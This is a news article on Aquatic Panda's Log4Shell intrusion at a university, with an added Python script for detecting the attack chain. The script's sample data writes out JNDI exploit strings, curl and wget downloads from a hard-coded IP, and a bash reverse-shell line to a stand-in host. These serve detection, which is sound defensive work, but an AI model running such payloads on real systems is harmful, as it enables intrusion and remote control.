Aquatic Panda APT hits the academic sector by abusing the Log4Shell flaw

February 8, 2022
Aquatic Panda APT Academic Sector Log4Shell Flaw Vulnerability Log4j

Aquatic Panda, a China-based advanced persistent threat (APT) group, has been observed exploiting the Log4j flaw (Log4Shell) against large academic institutions. According to researchers, the group harvested credentials from the compromised environment that could be abused in later operations.

Aquatic Panda is a relatively new name on the threat landscape: researchers first observed its activity in May 2020. In this campaign the group added the recently disclosed Log4Shell vulnerability to its toolkit.

The researchers noticed abnormal behaviour on an Apache Tomcat server belonging to a vulnerable VMware Horizon instance run by a large academic institution. The intrusion was detected and contained early, before it could spread within the targeted university.

Aquatic Panda relies on tooling that maintains persistent access while it collects trade secrets and intellectual property.

During the attack, the group first ran connectivity checks through DNS lookups for a subdomain under the Apache Tomcat service hosted on the VMware Horizon instance. It then executed a series of Linux commands, including attempts to use curl and wget to retrieve tooling, followed by an attempt to launch a bash-based interactive shell pointed at a hard-coded IP address.
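The chain above (a JNDI lookup string arriving in a request to the Tomcat front end, then the Java process spawning curl, wget or an interactive bash shell aimed at a hard-coded IP) is something a defender can detect from web logs and process-creation telemetry. The following is an added example, not code from the original article or from the researchers who investigated the intrusion. It assumes Apache-style access-log lines and a minimal process event with parent image, child image and command line; every log line, process event and IP address below is constructed for illustration (203.0.113.0/24 is a documentation range). The JNDI check also collapses the `${lower:…}`, `${upper:…}` and `${…:-…}` lookups attackers use to obscure the literal `jndi`.

```python
"""Detection sketch for a Log4Shell exploitation chain: a JNDI lookup in an
inbound request, then the Java/Tomcat process spawning a downloader or a
shell that references a hard-coded IP. All data here is constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Lookups commonly used to split "jndi" into fragments that evade naive matching.
CASE_LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def normalize_lookups(text: str) -> str:
    """Collapse ${lower:x}, ${upper:x} and ${name:-x} to x until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP_RE.sub(lambda m: m.group(1), text)
        text = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), text)
    return text


def has_jndi_lookup(line: str) -> bool:
    """True if the raw line, or its de-obfuscated form, carries a ${jndi:...} lookup."""
    return bool(JNDI_RE.search(line) or JNDI_RE.search(normalize_lookups(line)))


@dataclass
class ProcessEvent:
    parent_image: str   # path of the parent process, e.g. .../bin/java
    image: str          # path of the child process, e.g. /usr/bin/curl
    command_line: str


JAVA_PARENTS = ("java", "java.exe", "tomcat", "tomcat8", "tomcat9")
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "dash"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_process(ev: ProcessEvent) -> Optional[str]:
    """Flag a Java/Tomcat parent launching a downloader or shell; note hard-coded IPs."""
    if basename(ev.parent_image) not in JAVA_PARENTS:
        return None
    child = basename(ev.image)
    ips = IPV4_RE.findall(ev.command_line)
    if child in DOWNLOADERS and ips:
        return f"java spawned {child} with hard-coded IP {ips[0]}"
    if child in SHELLS and ("/dev/tcp/" in ev.command_line or ips):
        return f"java spawned {child} with hard-coded IP (possible reverse shell)"
    if child in DOWNLOADERS | SHELLS:
        return f"java spawned {child}"
    return None


def scan_requests(lines: List[str]) -> List[int]:
    """Indices of access-log lines carrying a JNDI lookup."""
    return [i for i, line in enumerate(lines) if has_jndi_lookup(line)]


def scan_processes(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """(index, verdict) for every process event that matches the chain."""
    hits = []
    for i, ev in enumerate(events):
        verdict = classify_process(ev)
        if verdict:
            hits.append((i, verdict))
    return hits


# Constructed sample data (not real logs): one benign request, one plain
# JNDI payload in the User-Agent, one obfuscated payload.
SAMPLE_REQUESTS = [
    '203.0.113.10 - - [15/Dec/2021:10:01:02 +0000] "GET /portal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [15/Dec/2021:10:01:09 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [15/Dec/2021:10:01:15 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:rmi://203.0.113.10:1099/b}"',
]
SAMPLE_PROCESSES = [
    ProcessEvent("/usr/lib/jvm/java-8-openjdk/bin/java", "/usr/bin/curl",
                 "curl -s http://203.0.113.10:8080/x.sh -o /tmp/x.sh"),
    ProcessEvent("/usr/lib/jvm/java-8-openjdk/bin/java", "/bin/bash",
                 "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"),
    ProcessEvent("/bin/bash", "/usr/bin/curl", "curl https://updates.example.test/latest"),
    ProcessEvent("/usr/lib/jvm/java-8-openjdk/bin/java", "/usr/bin/wget",
                 "wget http://203.0.113.10/t.tar"),
]

if __name__ == "__main__":
    for i in scan_requests(SAMPLE_REQUESTS):
        print("JNDI lookup in request:", SAMPLE_REQUESTS[i])
    for i, verdict in scan_processes(SAMPLE_PROCESSES):
        print(f"process event {i}: {verdict}")
```

The two checks are deliberately kept separate: the request-side match alone is noisy during an internet-wide scanning wave, while a Java parent launching curl, wget or bash is rare on a Horizon server and is the signal that an exploit actually landed. Correlating both within a short window, as the researchers did here, is what turns scanning noise into an incident.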

Researchers later tied the remote server used in the attacks against the academic institutions to infrastructure affiliated with the Aquatic Panda APT group.

The Log4Shell vulnerability is currently being exploited by a wide range of threat actors worldwide. Microsoft has warned that nation-state groups linked to China, Iran, North Korea and Turkey are among those actively abusing the flaw.

Separately, the US Federal Trade Commission issued an advisory urging organisations to remediate the flaw proactively, warning that it intends to use its legal authority against companies that fail to take reasonable steps to protect consumer data from it.

Log4j is embedded in a vast number of applications running on millions of systems across every industry, which is why exploitation of this flaw is so widespread and hard to anticipate. Governments and private firms worldwide have issued guidance on identifying and patching vulnerable Log4j deployments.
